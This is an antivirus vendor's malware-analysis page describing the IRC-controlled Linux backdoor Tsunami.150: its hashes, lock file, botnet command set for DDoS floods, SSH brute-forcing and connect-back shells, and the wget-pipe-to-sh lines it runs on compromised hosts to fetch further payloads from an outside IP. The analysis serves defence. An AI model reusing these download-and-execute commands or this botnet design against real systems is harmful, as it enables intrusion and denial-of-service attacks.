Protégez votre univers

Nos autres ressources

  • free.drweb.fr — utilitaires gratuits, plugins, widgets
  • av-desk.com — service Internet pour les prestataires de services Dr.Web AV-Desk
  • curenet.drweb.com — l'utilitaire de désinfection réseau Dr.Web CureNet!
Fermer

Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Linux.BackDoor.Tsunami.150

Added to the Dr.Web virus database: 2015-07-23

Virus description added:

SHA1:

  • 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
  • 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)

Backdoor for Linux OSes that gets installed on the system by Linux.PNScan.1. It uses "/var/run/.boss.pid" as a lock file.

To connect to the IRC server, the Trojan generates the name and nickname string as follows:

m64|dog|root|%c%c%c%c%c%c%c%c%c

where %c indicates a random number from the "0123456789" set.

If connection attempt is successful, the malicious program sends the following commands to the server:

NICK <nick>\n
USER x00 localhost localhost :dogscan\n

where <nick> indicates a nickname generated as described above.

While establishing a connection to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:

CommandActionComments
352Set a fake IP
376Join the channelSend(fd, "MODE %s -xi\n", nick);
Send(fd, "MODE %s +B\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
433Generate a new nickname
ERRORGenerate a new nickname
422Join the channelSend(fd, "MODE %s -xi\n", nick);
Send(fd, "MODE %s +B\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
NICKTake a string from the command as a nickname
PINGSend PONG
PRIVMSGExecute a special command

Moreover, the Trojan can execute a number of extended commands.

CommandActionSyntax
RANDOMFLOODRandomly switch between ACK and SYN FloodRANDOMFLOOD <target> <port> <secs>
NSACKFLOODACK FloodNSACKFLOOD <target> <port> <secs>
NSSYNFLOODSYN FloodNSSYNFLOOD <target> <port> <secs>
ACKFLOODACK Flood (spoofed)
SYNFLOODSYN Flood (spoofed)SYNFLOOD <target> <port> <secs>
UDPUDP FloodUDP <target> <port> <secs>
UNKNOWNLaunch a DDoS attackUNKNOWN <target> <secs>
SERVERChange the server to the one specified in the command
GETSPOOFSGet spoofing parameters
SPOOFSSet an IP or an IP range for spoofingSPOOFS <iprange/ip>
GETDownload a specified fileGET <url> <save as>
VERSIONReturn backdoor's version
KILLALLTerminate a DDoS attack
HELPDisplay the list of available commands
CBACKConnect backCBACK <ip> <port> connectback shell
SCANRNDBrute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used)SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes>
SCANRND2Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a dictionary specified in the incoming parameters is used)SCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd>
SCANSUBBrute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary)SCANSUB <192.168> <threads>
SCANSUB2Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a dictionary specified in the incoming parameters)SCANSUB2 <192.168> <threads> <user> <passwd>
DOGRNDBrute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used)DOGRND <192 or 192.168 or 192.168.0> <threads> <minutes>
DOGSUBBrute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary)DOGSUB <192.168> <threads>
IRCSend specified IRC commands to the serverIRC <arg1> <arg2> <arg...>
SHExecute a set of SH commandsSH <arg1> <arg2> <arg...>

Once the login:password combination is found, SCANRND, SCANRND2, SCANSUB, SCANSUB2 execute the following command on the remote system:

wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>↦1

or

wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>↦1 

Downloaded scripts install Linux.BackDoor.Tsunami.144 on the system.

Once the login:password combination is found, DOGRND, DOGSUB execute the following command:

uname -a || echo - 

After that, the "##scaninfo##" user receives the following information in the IRC chat:

[g+] <login>@<ip> | <password> | <os> \n

Recommandations pour le traitement


Linux

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série

Editeur russe des solutions antivirus Dr.Web
Expérience dans le développement depuis 1992
Les internautes dans plus de 200 pays utilisent Dr.Web
L'antivirus est fourni en tant que service depuis 2007
Support 24/24

Dr.Web © Doctor Web
2003 — 2021

Doctor Web - éditeur russe des solutions antivirus Dr.Web. Doctor Web développe les produits Dr.Web depuis 1992.

333b, Avenue de Colmar, 67100 Strasbourg